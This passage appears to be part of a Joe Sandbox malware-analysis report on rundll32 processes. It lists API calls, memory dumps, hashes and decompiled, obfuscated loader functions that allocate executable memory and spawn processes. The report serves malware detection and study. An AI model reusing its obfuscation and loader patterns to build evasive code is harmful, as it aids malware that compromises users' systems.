				signed int _v16;
				signed int _v20;
				void* _t32;
				int _t39;
				void* _t41;
				WCHAR* _t43;

				_push(_a16);
				_t43 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E004156B2(_t32);
				_v20 = 0xc112;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x00187660;
				_v16 = 0x44a2;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x44a20c46;
				_v8 = 0x80d5;
				_v8 = _v8 << 6;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0x406aec0c;
				_v12 = 0x3c7d;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x000035cf;
				_push(0xf9b1620b);
				_push(0x903a0366);
				_t41 = 0x28;
				E004204D5(_t41, __edx);
				_t39 = lstrcmpiW(_a4, _t43); // executed
				return _t39;
			}

APIs

lstrcmpiW.KERNELBASE(000035CF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D8FA

Memory Dump Source

Source File: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 0000000E.00000002.2107940232.0000000000431000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2107944736.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 5112a81a2239dc82ca800b34fc2509730bf944e1d5fe2a59776ea9b54c5e6d15
Instruction ID: f826a495ce62a45dbfb5adbb8bc125be001f84b1a7f569a8b80af22021850ea9
Opcode Fuzzy Hash: 5112a81a2239dc82ca800b34fc2509730bf944e1d5fe2a59776ea9b54c5e6d15
Instruction Fuzzy Hash: F4112372C01218BBEF41EFE4C90A8DEBBB4FB00358F108498E92562251D7B98B24DF81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00438330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 00438361
GetSystemMetrics.USER32(00000000), ref: 0043839D
GetSystemMetrics.USER32(00000001), ref: 004383A8

Strings

DISPLAY, xrefs: 004383C9
/}Au, xrefs: 0043839D, 004383A8
GetMonitorInfo, xrefs: 00438348

Memory Dump Source

Source File: 0000000E.00000002.2107949566.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_434000_rundll32.jbxd

Similarity

API ID: MetricsSystem$InfoMonitor
String ID: /}Au$DISPLAY$GetMonitorInfo
API String ID: 4250584380-1428758730
Opcode ID: 4131b143f35eef00fbacdab9590b21563ebd98cad3d0477150dd2569b284ccd2
Instruction ID: 6ae3c3431e0a0f4cdc9b09df252bdb408045dcfe36ad5bb39f7b412c6d358208
Opcode Fuzzy Hash: 4131b143f35eef00fbacdab9590b21563ebd98cad3d0477150dd2569b284ccd2
Instruction Fuzzy Hash: 3D11E1B16017059FD3208F209C44BA7F7E9EB09B10F01453EFD4AD7380DBB5A8888BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004385AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 004385E5
GetSystemMetrics.USER32(00000000), ref: 0043860A
GetSystemMetrics.USER32(00000001), ref: 00438615

Strings

EnumDisplayMonitors, xrefs: 004385C4
/}Au, xrefs: 0043860A, 00438615

Memory Dump Source

Source File: 0000000E.00000002.2107949566.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_434000_rundll32.jbxd

Similarity

API ID: MetricsSystem$DisplayEnumMonitors
String ID: /}Au$EnumDisplayMonitors
API String ID: 1389147845-1105134141
Opcode ID: e2be4983ebd12d48cce4a90cbb448c6a2ea08e143c2634cf714a81f9f59210da
Instruction ID: 0ca048bcfe3694a12e1b1f7d9f96d1fa7bb67d705eef21a80d2edb2b16462a88
Opcode Fuzzy Hash: e2be4983ebd12d48cce4a90cbb448c6a2ea08e143c2634cf714a81f9f59210da
Instruction Fuzzy Hash: A63150B2901209AFDB01DFA5CC41AEFB7BCAF48304F01552BF915D3200EB38DA418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00438404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00438471
GetSystemMetrics.USER32(00000001), ref: 0043847C

Strings

DISPLAY, xrefs: 0043849D
/}Au, xrefs: 00438471, 0043847C
GetMonitorInfoA, xrefs: 0043841C

Memory Dump Source

Source File: 0000000E.00000002.2107949566.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_434000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoA
API String ID: 4116985748-2822609925
Opcode ID: 02b350f8d3d1495dbecc2dddd6d5c4a4fa81328eb3cb344016d6614a6830fc8c
Instruction ID: da24feb5e38c32448feb32b3003a274445e8e8f52c7837f53d428e63377e6ad2
Opcode Fuzzy Hash: 02b350f8d3d1495dbecc2dddd6d5c4a4fa81328eb3cb344016d6614a6830fc8c
Instruction Fuzzy Hash: 711106B16017069FD720DF609C44BA7F7E9EB19320F01493FFD598B640EB78A88487A9

Uniqueness

Uniqueness Score: -1.00%

Function 004384D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00438545
GetSystemMetrics.USER32(00000001), ref: 00438550

Strings

DISPLAY, xrefs: 00438571
/}Au, xrefs: 00438545, 00438550
GetMonitorInfoW, xrefs: 004384F0

Memory Dump Source

Source File: 0000000E.00000002.2107949566.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_434000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoW
API String ID: 4116985748-1558784340
Opcode ID: 78462e94f7d740b16776c155514024d8479198731bd826b7bf80595dd752965b
Instruction ID: d2697804456ec8315f0ec931079aca8313af6e7e7ef8fb44397806324c22f84a
Opcode Fuzzy Hash: 78462e94f7d740b16776c155514024d8479198731bd826b7bf80595dd752965b
Instruction Fuzzy Hash: CD11E1B1A01705AFD720DF618C44BA7F7E9EB09310F05492FFD19C7240DB78A8848BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00438298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004382E6
GetSystemMetrics.USER32(00000001), ref: 004382F8

Strings

MonitorFromPoint, xrefs: 004382AA
/}Au, xrefs: 004382E6, 004382F8

Memory Dump Source

Source File: 0000000E.00000002.2107949566.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_434000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromPoint
API String ID: 4116985748-3670600901
Opcode ID: 242c5e28f5363545f22d7731d7253973bb46cd2285502f112e52679fe82f2f70
Instruction ID: 1cc1f1071fc2d50d00d2dc73532995e128b0d6c6102d72282368babe0669397d
Opcode Fuzzy Hash: 242c5e28f5363545f22d7731d7253973bb46cd2285502f112e52679fe82f2f70
Instruction Fuzzy Hash: 4A01A2B1201709AFDB005F51DC44B9EFB56EB48B54F05503EFE198B351CB76AC858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00438170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004381C1
GetSystemMetrics.USER32(00000001), ref: 004381CD

Strings

MonitorFromRect, xrefs: 00438185
/}Au, xrefs: 004381C1, 004381CD

Memory Dump Source

Source File: 0000000E.00000002.2107949566.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_434000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromRect
API String ID: 4116985748-120404372
Opcode ID: b7c59f5e9a28591805704d8eb5efe956add44f9d93f24166d3243eba57d13ae0
Instruction ID: 193a60a69ac6db6e0e2c57acc0a3772f009d2559bd06e820007d127a1c22a2b2
Opcode Fuzzy Hash: b7c59f5e9a28591805704d8eb5efe956add44f9d93f24166d3243eba57d13ae0
Instruction Fuzzy Hash: AC018F312003149BDB109B04DC85B67F796E748395F06906FFD08CA242CA799C8A8BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00472B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00472B7C
DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00472BA9
DdeGetLastError.USER32(00000015), ref: 00472BBB
DdeFreeStringHandle.USER32(00000015,?), ref: 00472BCD

Memory Dump Source

Source File: 0000000E.00000002.2107949566.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_434000_rundll32.jbxd

Similarity

API ID: HandleString$ClientCreateErrorFreeLastTransaction
String ID:
API String ID: 2421758087-0
Opcode ID: c2238b1e27b94fe61dc4be4caeacbeb57bfca1eb7569e6f8106d52b6c5dad098
Instruction ID: 765300d3f5e3bbff5fb2c2544ef87909bbd735a4662d33ecf9462ffa88e72a4d
Opcode Fuzzy Hash: c2238b1e27b94fe61dc4be4caeacbeb57bfca1eb7569e6f8106d52b6c5dad098
Instruction Fuzzy Hash: 552138B42042409FDB40DF69C9C1F9A77E8AB49310F15C196F948CF2A6D679E880CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00471428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

DdeQueryConvInfo.USER32(?,?,00000060), ref: 004714BF

Strings

0G, xrefs: 00471607
`, xrefs: 00471498

Memory Dump Source

Source File: 0000000E.00000002.2107949566.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_434000_rundll32.jbxd

Similarity

API ID: ConvInfoQuery
String ID: 0G$`
API String ID: 701148680-3241260100
Opcode ID: 9e02d66339d7ddf8b573539b21d55ed548c50e9bf90fbc62443992b6d6763949
Instruction ID: 318bdb09d630f8d802be214e4d4d1a87daecc8ad5ae4e503b2883369cae3f062
Opcode Fuzzy Hash: 9e02d66339d7ddf8b573539b21d55ed548c50e9bf90fbc62443992b6d6763949
Instruction Fuzzy Hash: 80516376A002199BCB14DE6DDA854EF73B9AB48354F15C026FD0EE7360CA38DD06C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 004380E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 00438110

Strings

GetSystemMetrics, xrefs: 004380F8
/}Au, xrefs: 004380FD, 0043810A, 00438110

Memory Dump Source

Source File: 0000000E.00000002.2107949566.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_434000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$GetSystemMetrics
API String ID: 4116985748-3773086709
Opcode ID: 64d931bea9c76e4fe3123310add8274005917f582cae50c34d6ff221ed16196a
Instruction ID: a180f6a806744f77f9d2f12b9412a4c86aec5cbc8f49c144a73a20ca680ee0d1
Opcode Fuzzy Hash: 64d931bea9c76e4fe3123310add8274005917f582cae50c34d6ff221ed16196a
Instruction Fuzzy Hash: EEF0F0701017004ACF145F388E80A67F566A74E334F75AA3FF129472D2CE7C8987964E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2500 Parent PID: 2844 rundll32.exeCOMMON

Executed Functions

Function 001D3928, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnhMetaFileA.GDI32(trty55345), ref: 001D39C2
VirtualAlloc.KERNELBASE(00000000,001D6CB4,00001000,00000040), ref: 001D3A8E

Strings

trty55345, xrefs: 001D39BD

Memory Dump Source

Source File: 0000000F.00000002.2108229093.0000000000194000.00000020.00020000.sdmp, Offset: 00194000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_194000_rundll32.jbxd

Similarity

API ID: AllocFileMetaVirtual
String ID: trty55345
API String ID: 2643768156-4105825235
Opcode ID: bdd191ecdc5bc7f9cb68dd817ee6eec4fb10876099078819200dd2b82af82834
Instruction ID: 77f1f6680223345bac657840b70f1e91ba424c651a88359dbde3f729d6f2a3a2
Opcode Fuzzy Hash: bdd191ecdc5bc7f9cb68dd817ee6eec4fb10876099078819200dd2b82af82834
Instruction Fuzzy Hash: C261CA742232009FD750EF68ED86A1A37B2F718319B00802BE0898BBB5DF75A9C4DF05

Uniqueness

Uniqueness Score: -1.00%

Function 001D1638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DdeInitializeA.USER32(00000044,Function_0003D428,00000000,00000000), ref: 001D1686

Strings

Link, xrefs: 001D1666

Memory Dump Source

Source File: 0000000F.00000002.2108229093.0000000000194000.00000020.00020000.sdmp, Offset: 00194000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_194000_rundll32.jbxd

Similarity

API ID: Initialize
String ID: Link
API String ID: 2538663250-2526951119
Opcode ID: ed7deab5736817eb7ac95a33b3528372f851ac16162be46a633183dbe81978d5
Instruction ID: 6da656dbb8ce5765192512a4f6e1bd74e2f28cc943a604384abd8236de168b3c
Opcode Fuzzy Hash: ed7deab5736817eb7ac95a33b3528372f851ac16162be46a633183dbe81978d5
Instruction Fuzzy Hash: B5119A70604740BBD720FBB4CD82A4E77F5AF25B00B909926F414DBBA1EB76EA419B50

Uniqueness

Uniqueness Score: -1.00%

Function 002D0540, Relevance: 3.3, APIs: 2, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 002D058F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 002D07D9

Memory Dump Source

Source File: 0000000F.00000002.2108344528.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: 897ea3b67e29944d87198f88f06391a11982bb98cbd1d6e2f25d26f54dc7d588
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: 66C1A875A10209DFCB48CF98C590EAEB7B5BF88304F248159E919AB351D735EE52CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001D1A14, Relevance: 3.1, APIs: 2, Instructions: 56
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001D1AC8: DdeFreeStringHandle.USER32(?,?), ref: 001D1AE8

DdeCreateStringHandleA.USER32(?,00000000), ref: 001D1A82
DdeNameService.USER32(?,00000000,00000000,00000001), ref: 001D1A95

Memory Dump Source

Source File: 0000000F.00000002.2108229093.0000000000194000.00000020.00020000.sdmp, Offset: 00194000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_194000_rundll32.jbxd

Similarity

API ID: HandleString$CreateFreeNameService
String ID:
API String ID: 374373348-0
Opcode ID: 8da48896b359ece45721a3a7fcfd809368eaec4fa484cfd228edbe142fd47b4e
Instruction ID: fbdaa9b762db906bbc7543ad4293020617f48bd0b650a94ab68838f423cae219
Opcode Fuzzy Hash: 8da48896b359ece45721a3a7fcfd809368eaec4fa484cfd228edbe142fd47b4e
Instruction Fuzzy Hash: 93115E35711254BFDB15EFA4C982A4A37ADAF59B00B9145A1FD089B347DB70ED008794

Uniqueness

Uniqueness Score: -1.00%

Function 002D0020, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 002D00A4

Strings

VirtualAlloc, xrefs: 002D0089, 002D008C

Memory Dump Source

Source File: 0000000F.00000002.2108344528.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: d4ae9e6d133c0b2028846385e581494c588ba7efc27a2a541b83d23804dc36b3
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: 5F110060D08289EAEF01D7E89449BFEBFB55B11704F044098D6446A282D6BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0018F2F9, Relevance: 1.6, APIs: 1, Instructions: 72
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 30%

			E0018F2F9(void* __edx, WCHAR* _a8, WCHAR* _a12, int _a16, struct _STARTUPINFOW* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t64;
				signed int _t65;

				_push(_a56);
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E001756B2(_t54);
				_v28 = 0x170c99;
				_v24 = 0;
				_v16 = 0x438d;
				_v16 = _v16 ^ 0x1c0fc040;
				_v16 = _v16 + 0xffffa13b;
				_v16 = _v16 ^ 0x1c0f1065;
				_v8 = 0x7b12;
				_v8 = _v8 + 0xe48b;
				_v8 = _v8 << 2;
				_t65 = 0x70;
				_push(0xf9b1620b);
				_v8 = _v8 * 0x77;
				_v8 = _v8 ^ 0x028dd8b4;
				_v20 = 0x8aa6;
				_v20 = _v20 + 0x376a;
				_v20 = _v20 ^ 0x0000ade9;
				_v12 = 0x19;
				_push(0x90aa198d);
				_v12 = _v12 / _t65;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x00005708;
				E001804D5(0x2ee, _v12 % _t65);
				_t64 = CreateProcessW(_a8, _a12, 0, 0, _a16, 0, 0, 0, _a20, _a56); // executed
				return _t64;
			}

0x0018f300
0x0018f305
0x0018f306
0x0018f307
0x0018f30a
0x0018f30d
0x0018f310
0x0018f311
0x0018f314
0x0018f317
0x0018f31a
0x0018f31d
0x0018f320
0x0018f323
0x0018f325
0x0018f326
0x0018f32b
0x0018f335
0x0018f33a
0x0018f341
0x0018f348
0x0018f34f
0x0018f356
0x0018f35d
0x0018f364
0x0018f36e
0x0018f36f
0x0018f377
0x0018f37a
0x0018f381
0x0018f388
0x0018f38f
0x0018f396
0x0018f3a2
0x0018f3a7
0x0018f3af
0x0018f3b3
0x0018f3c6
0x0018f3e2
0x0018f3e8

APIs

CreateProcessW.KERNEL32(1C0F1065,0000ADE9,00000000,00000000,?,00000000,00000000,00000000,00170C99,?), ref: 0018F3E2

Memory Dump Source

Source File: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, Offset: 00170000, based on PE: true

Associated: 0000000F.00000002.2108221301.0000000000191000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.2108225130.0000000000193000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 026aef61d0656430dbbcca425602156f2ab332a660c9be10ca3ab0af62cf9408
Instruction ID: dcbadbf4a103280ae0d1b5290f2fd142b8dd778cdf16b0324aff1083605bf1be
Opcode Fuzzy Hash: 026aef61d0656430dbbcca425602156f2ab332a660c9be10ca3ab0af62cf9408
Instruction Fuzzy Hash: 5D31E072901218FBDF51DEA5C90A8DFBFB5FF08354F108188F91866260D3B68A64EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00171D54, Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00171E0C

Memory Dump Source

Source File: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, Offset: 00170000, based on PE: true

Associated: 0000000F.00000002.2108221301.0000000000191000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.2108225130.0000000000193000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 7893705023e0342a7cd03c01fb48380ada36fa37b15ddf495c5e823a11f917f8
Instruction ID: 2c4dda90c91d64b3c9c94e0924891975c270232de06f6c24e5d2db8ada504de8
Opcode Fuzzy Hash: 7893705023e0342a7cd03c01fb48380ada36fa37b15ddf495c5e823a11f917f8
Instruction Fuzzy Hash: 16213371C01218ABDF01AFE4CC4A8DEBFB5FB05314F108088F91462260D3795B24DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0017CD27, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E0017CD27() {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _t48;

				_v20 = 0x9362;
				_v20 = _v20 << 3;
				_v20 = _v20 + 0x3ac5;
				_v20 = _v20 ^ 0x0004a93d;
				_v16 = 0x2d14;
				_v16 = _v16 | 0xd3f48c41;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x069fac5e;
				_v12 = 0xc5b1;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0x469c37c1;
				_t48 = 0x70;
				_push(0xf9b1620b);
				_v12 = _v12 / _t48;
				_v12 = _v12 ^ 0x00a22cf4;
				_v8 = 0x5bb6;
				_v8 = _v8 >> 4;
				_v8 = _v8 | 0x6c69259f;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0000087c;
				_push(0xa43506f8);
				E001804D5(0x16b, _v12 % _t48);
				ExitProcess(0);
			}

0x0017cd2d
0x0017cd36
0x0017cd3a
0x0017cd41
0x0017cd48
0x0017cd4f
0x0017cd56
0x0017cd5a
0x0017cd61
0x0017cd68
0x0017cd6c
0x0017cd78
0x0017cd7b
0x0017cd80
0x0017cd86
0x0017cd92
0x0017cd99
0x0017cd9d
0x0017cda4
0x0017cda8
0x0017cdbb
0x0017cdc0
0x0017cdca

APIs

ExitProcess.KERNEL32(00000000), ref: 0017CDCA

Memory Dump Source

Source File: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, Offset: 00170000, based on PE: true

Associated: 0000000F.00000002.2108221301.0000000000191000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.2108225130.0000000000193000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2e9f4816a751cc7b3e2e4233dde82b2bf974ba370e125a65ab7361591f6c0db6
Instruction ID: cdcc143eb02cb9a0ad273cbb2ad766a62f0296e312883aea396ab80f631f7dfe
Opcode Fuzzy Hash: 2e9f4816a751cc7b3e2e4233dde82b2bf974ba370e125a65ab7361591f6c0db6
Instruction Fuzzy Hash: B3112771D0160CEBEB48DFE8C84A59EBBB0FB04708F108599D526A7294C3B51B48DF81

Uniqueness

Uniqueness Score: -1.00%

Function 0017D867, Relevance: 1.3, APIs: 1, Instructions: 44
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E0017D867(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t32;
				int _t39;
				void* _t41;
				WCHAR* _t43;

				_push(_a16);
				_t43 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001756B2(_t32);
				_v20 = 0xc112;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x00187660;
				_v16 = 0x44a2;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x44a20c46;
				_v8 = 0x80d5;
				_v8 = _v8 << 6;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0x406aec0c;
				_v12 = 0x3c7d;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x000035cf;
				_push(0xf9b1620b);
				_push(0x903a0366);
				_t41 = 0x28;
				E001804D5(_t41, __edx);
				_t39 = lstrcmpiW(_a4, _t43); // executed
				return _t39;
			}

0x0017d86e
0x0017d871
0x0017d873
0x0017d876
0x0017d879
0x0017d87c
0x0017d87d
0x0017d87e
0x0017d883
0x0017d88d
0x0017d891
0x0017d898
0x0017d89f
0x0017d8a3
0x0017d8aa
0x0017d8b1
0x0017d8b5
0x0017d8b9
0x0017d8c0
0x0017d8c7
0x0017d8cb
0x0017d8de
0x0017d8e6
0x0017d8ed
0x0017d8ee
0x0017d8fa
0x0017d900

APIs

lstrcmpiW.KERNELBASE(000035CF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0017D8FA

Memory Dump Source

Source File: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, Offset: 00170000, based on PE: true

Associated: 0000000F.00000002.2108221301.0000000000191000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.2108225130.0000000000193000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 5112a81a2239dc82ca800b34fc2509730bf944e1d5fe2a59776ea9b54c5e6d15
Instruction ID: 00ef109da63707d723fc7010561c852b7e289194a3c9970061d81fe622c3d6a3
Opcode Fuzzy Hash: 5112a81a2239dc82ca800b34fc2509730bf944e1d5fe2a59776ea9b54c5e6d15
Instruction Fuzzy Hash: 6511F372C0121CBBEF51EFE4C90A8DEBBB5FB04354F108598E92566251D7B58B28DF81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00198330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 00198361
GetSystemMetrics.USER32(00000000), ref: 0019839D
GetSystemMetrics.USER32(00000001), ref: 001983A8

Strings

GetMonitorInfo, xrefs: 00198348
DISPLAY, xrefs: 001983C9
/}Au, xrefs: 0019839D, 001983A8

Memory Dump Source

Source File: 0000000F.00000002.2108229093.0000000000194000.00000020.00020000.sdmp, Offset: 00194000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_194000_rundll32.jbxd

Similarity

API ID: MetricsSystem$InfoMonitor
String ID: /}Au$DISPLAY$GetMonitorInfo
API String ID: 4250584380-1428758730
Opcode ID: cb4a8fdb74882b9a83364a2da23834108b39f59e839db22d2e2394d2b3d95d77
Instruction ID: 849b2a57f95f6360ba5305357f9855cd91554b9c5d9ea5e7dab4096d7435fc52
Opcode Fuzzy Hash: cb4a8fdb74882b9a83364a2da23834108b39f59e839db22d2e2394d2b3d95d77
Instruction Fuzzy Hash: D8118E716027159FDB208F64DC44BABB7E8FB46B14F00452AED4AD7641DBB0E9458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001985AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 001985E5
GetSystemMetrics.USER32(00000000), ref: 0019860A
GetSystemMetrics.USER32(00000001), ref: 00198615

Strings

EnumDisplayMonitors, xrefs: 001985C4
/}Au, xrefs: 0019860A, 00198615

Memory Dump Source

Source File: 0000000F.00000002.2108229093.0000000000194000.00000020.00020000.sdmp, Offset: 00194000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_194000_rundll32.jbxd

Similarity

API ID: MetricsSystem$DisplayEnumMonitors
String ID: /}Au$EnumDisplayMonitors
API String ID: 1389147845-1105134141
Opcode ID: e3ed2fb30a03a0d1c989bcbbb7f9e6fee00971d9c82f67c3775a44c1b9fa6c36
